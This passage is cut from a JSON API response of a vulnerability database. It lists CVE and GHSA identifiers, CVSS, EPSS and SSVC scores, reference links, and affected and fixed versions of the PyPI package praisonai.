g_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:08:17Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-693f-pf34-72c5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35615","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35615"},{"reference_url":"https://github.com/advisories/GHSA-693f-pf34-72c5","reference_id":"GHSA-693f-pf34-72c5","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-693f-pf34-72c5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/189197?format=json","purl":"pkg:pypi/praisonai@1.5.113","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@1.5.113"},{"url":"http://public2.vulnerablecode.io/api/packages/955570?format=json","purl":"pkg:pypi/praisonai@2.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-42xt-269j-m3hw"},{"vulnerability":"VCID-5f3z-55fe-7kh7"},{"vulnerability":"VCID-5x3f-r7ft-3ke4"},{"vulnerability":"VCID-78hn-811u-1fgg"},{"vulnerability":"VCID-7fza-phhr-1ffb"},{"vulnerability":"VCID-9xhc-88h5-uya7"},{"vulnerability":"VCID-as2k-h8e6-2bbg"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-bm8e-na69-2qhr"},{"vulnerability":"VCID-ceav-utcz-33fc"},{"vulnerability":"VCID-e9s4-2q39-97bu"},{"vulnerability":"VCID-gtfg-wf6b-p7et"},{"vulnerability":"VCID-hby8-eypb-3ubk"},{"vulnerability":"VCID-k8kd-r72v-d7hd"},{"vulnerability":"VCID-kqsn-x28j-8bds"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-m1vr-ksyx-ebh1"},{"vulnerability":"VCID-m23z-e1es-byhy"},{"vulnerability":"VCID-maks-3cg8-kfcr"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-mq2r-dw6g-77fx"},{"vulnerability":"VCID-mwe3-4jct-jqhk"},{"vulnerability":"VCID-qg8p-cewa-6khr"},{"vulnerability":"VCID-rymq-5dgd-t7g2"},{"vulnerability":"VCID-seay-h824-kug9"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-w65u-12gv-cud4"},{"vulnerability":"VCID-wuve-58em-sqas"},{"vulnerability":"VCID-x2qs-qxtq-4fax"},{"vulnerability":"VCID-xdc3-v772-zbf4"},{"vulnerability":"VCID-zmma-2kzw-7bc8"},{"vulnerability":"VCID-zwad-4gjg-e3e2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@2.0.0"}],"aliases":["CVE-2026-35615","GHSA-693f-pf34-72c5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jpgv-pkzg-yfh6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331888?format=json","vulnerability_id":"VCID-k8kd-r72v-d7hd","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40158","reference_id":"","reference_type":"","scores":[{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11435","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40158"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3c4r-6p77-xwr7","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T18:31:02Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3c4r-6p77-xwr7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40158","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40158"},{"reference_url":"https://github.com/advisories/GHSA-3c4r-6p77-xwr7","reference_id":"GHSA-3c4r-6p77-xwr7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3c4r-6p77-xwr7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188386?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-xdc3-v772-zbf4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40158","GHSA-3c4r-6p77-xwr7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k8kd-r72v-d7hd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/329930?format=json","vulnerability_id":"VCID-kqsn-x28j-8bds","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34952","reference_id":"","reference_type":"","scores":[{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06456","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34952"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfh6-vr3j-qc3g","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-06T15:35:18Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfh6-vr3j-qc3g"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34952","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34952"},{"reference_url":"https://github.com/advisories/GHSA-cfh6-vr3j-qc3g","reference_id":"GHSA-cfh6-vr3j-qc3g","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cfh6-vr3j-qc3g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188313?format=json","purl":"pkg:pypi/praisonai@4.5.97","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-42xt-269j-m3hw"},{"vulnerability":"VCID-5f3z-55fe-7kh7"},{"vulnerability":"VCID-5x3f-r7ft-3ke4"},{"vulnerability":"VCID-78hn-811u-1fgg"},{"vulnerability":"VCID-7fza-phhr-1ffb"},{"vulnerability":"VCID-9bnf-71rn-77e9"},{"vulnerability":"VCID-as2k-h8e6-2bbg"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-bm8e-na69-2qhr"},{"vulnerability":"VCID-ceav-utcz-33fc"},{"vulnerability":"VCID-e9s4-2q39-97bu"},{"vulnerability":"VCID-k8kd-r72v-d7hd"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-m1vr-ksyx-ebh1"},{"vulnerability":"VCID-m23z-e1es-byhy"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-mq2r-dw6g-77fx"},{"vulnerability":"VCID-mwe3-4jct-jqhk"},{"vulnerability":"VCID-qg8p-cewa-6khr"},{"vulnerability":"VCID-rymq-5dgd-t7g2"},{"vulnerability":"VCID-seay-h824-kug9"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-w65u-12gv-cud4"},{"vulnerability":"VCID-wuve-58em-sqas"},{"vulnerability":"VCID-xdc3-v772-zbf4"},{"vulnerability":"VCID-zmma-2kzw-7bc8"},{"vulnerability":"VCID-zwad-4gjg-e3e2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.97"}],"aliases":["CVE-2026-34952","GHSA-cfh6-vr3j-qc3g"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kqsn-x28j-8bds"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331973?format=json","vulnerability_id":"VCID-kz7y-x7tb-9qe8","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40288","reference_id":"","reference_type":"","scores":[{"value":"0.00141","scoring_system":"epss","scoring_elements":"0.33975","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40288"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.139","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.139"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-vc46-vw85-3wvm","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T15:56:49Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-vc46-vw85-3wvm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40288","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40288"},{"reference_url":"https://github.com/advisories/GHSA-vc46-vw85-3wvm","reference_id":"GHSA-vc46-vw85-3wvm","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vc46-vw85-3wvm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188755?format=json","purl":"pkg:pypi/praisonai@4.5.139","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-t82b-kttm-ukbq"},{"vulnerability":"VCID-xdc3-v772-zbf4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.139"}],"aliases":["CVE-2026-40288","GHSA-vc46-vw85-3wvm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kz7y-x7tb-9qe8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330601?format=json","vulnerability_id":"VCID-m1vr-ksyx-ebh1","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39305","reference_id":"","reference_type":"","scores":[{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22862","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39305"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-jfxc-v5g9-38xr","reference_id":"","reference_type":"","scores":[{"value":"9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H"},{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T17:27:44Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-jfxc-v5g9-38xr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39305","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39305"},{"reference_url":"https://github.com/advisories/GHSA-jfxc-v5g9-38xr","reference_id":"GHSA-jfxc-v5g9-38xr","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jfxc-v5g9-38xr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188803?format=json","purl":"pkg:pypi/praisonai@4.5.113","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-42xt-269j-m3hw"},{"vulnerability":"VCID-5f3z-55fe-7kh7"},{"vulnerability":"VCID-5x3f-r7ft-3ke4"},{"vulnerability":"VCID-78hn-811u-1fgg"},{"vulnerability":"VCID-7fza-phhr-1ffb"},{"vulnerability":"VCID-9bnf-71rn-77e9"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-ceav-utcz-33fc"},{"vulnerability":"VCID-k8kd-r72v-d7hd"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-m23z-e1es-byhy"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-mq2r-dw6g-77fx"},{"vulnerability":"VCID-mwe3-4jct-jqhk"},{"vulnerability":"VCID-qg8p-cewa-6khr"},{"vulnerability":"VCID-rymq-5dgd-t7g2"},{"vulnerability":"VCID-seay-h824-kug9"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-w65u-12gv-cud4"},{"vulnerability":"VCID-wuve-58em-sqas"},{"vulnerability":"VCID-xdc3-v772-zbf4"},{"vulnerability":"VCID-zmma-2kzw-7bc8"},{"vulnerability":"VCID-zwad-4gjg-e3e2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.113"}],"aliases":["CVE-2026-39305","GHSA-jfxc-v5g9-38xr"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-m1vr-ksyx-ebh1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331842?format=json","vulnerability_id":"VCID-m23z-e1es-byhy","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40088","reference_id":"","reference_type":"","scores":[{"value":"0.0008","scoring_system":"epss","scoring_elements":"0.23584","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40088"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.121","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.121"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2763-cj5r-c79m","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2763-cj5r-c79m"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40088","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40088"},{"reference_url":"https://github.com/advisories/GHSA-2763-cj5r-c79m","reference_id":"GHSA-2763-cj5r-c79m","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2763-cj5r-c79m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/189268?format=json","purl":"pkg:pypi/praisonai@4.5.121","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-42xt-269j-m3hw"},{"vulnerability":"VCID-78hn-811u-1fgg"},{"vulnerability":"VCID-7fza-phhr-1ffb"},{"vulnerability":"VCID-9bnf-71rn-77e9"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-ceav-utcz-33fc"},{"vulnerability":"VCID-k8kd-r72v-d7hd"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-mq2r-dw6g-77fx"},{"vulnerability":"VCID-mwe3-4jct-jqhk"},{"vulnerability":"VCID-rymq-5dgd-t7g2"},{"vulnerability":"VCID-seay-h824-kug9"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-w65u-12gv-cud4"},{"vulnerability":"VCID-wuve-58em-sqas"},{"vulnerability":"VCID-xdc3-v772-zbf4"},{"vulnerability":"VCID-zmma-2kzw-7bc8"},{"vulnerability":"VCID-zwad-4gjg-e3e2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.121"}],"aliases":["CVE-2026-40088","GHSA-2763-cj5r-c79m"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-m23z-e1es-byhy"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/329919?format=json","vulnerability_id":"VCID-maks-3cg8-kfcr","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34939","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04968","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34939"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8w9j-hc3g-3g7f","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-06T19:05:21Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8w9j-hc3g-3g7f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34939","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34939"},{"reference_url":"https://github.com/advisories/GHSA-8w9j-hc3g-3g7f","reference_id":"GHSA-8w9j-hc3g-3g7f","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8w9j-hc3g-3g7f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/189024?format=json","purl":"pkg:pypi/praisonai@4.5.90","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-42xt-269j-m3hw"},{"vulnerability":"VCID-5f3z-55fe-7kh7"},{"vulnerability":"VCID-5x3f-r7ft-3ke4"},{"vulnerability":"VCID-78hn-811u-1fgg"},{"vulnerability":"VCID-7fza-phhr-1ffb"},{"vulnerability":"VCID-9bnf-71rn-77e9"},{"vulnerability":"VCID-as2k-h8e6-2bbg"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-bm8e-na69-2qhr"},{"vulnerability":"VCID-ceav-utcz-33fc"},{"vulnerability":"VCID-e9s4-2q39-97bu"},{"vulnerability":"VCID-gtfg-wf6b-p7et"},{"vulnerability":"VCID-hby8-eypb-3ubk"},{"vulnerability":"VCID-k8kd-r72v-d7hd"},{"vulnerability":"VCID-kqsn-x28j-8bds"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-m1vr-ksyx-ebh1"},{"vulnerability":"VCID-m23z-e1es-byhy"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-mq2r-dw6g-77fx"},{"vulnerability":"VCID-mwe3-4jct-jqhk"},{"vulnerability":"VCID-qg8p-cewa-6khr"},{"vulnerability":"VCID-rymq-5dgd-t7g2"},{"vulnerability":"VCID-seay-h824-kug9"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-w65u-12gv-cud4"},{"vulnerability":"VCID-wuve-58em-sqas"},{"vulnerability":"VCID-xdc3-v772-zbf4"},{"vulnerability":"VCID-zmma-2kzw-7bc8"},{"vulnerability":"VCID-zwad-4gjg-e3e2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.90"}],"aliases":["CVE-2026-34939","GHSA-8w9j-hc3g-3g7f"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-maks-3cg8-kfcr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331993?format=json","vulnerability_id":"VCID-mker-659v-dfaa","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40315","reference_id":"","reference_type":"","scores":[{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13957","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40315"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/commit/0accebb2e3c3ec2fca66bbea0444fb7a35f0b4ef","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-14T13:25:07Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/commit/0accebb2e3c3ec2fca66bbea0444fb7a35f0b4ef"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.133","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.133"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x783-xp3g-mqhp","reference_id":"","reference_type":"","scores":[{"value":"M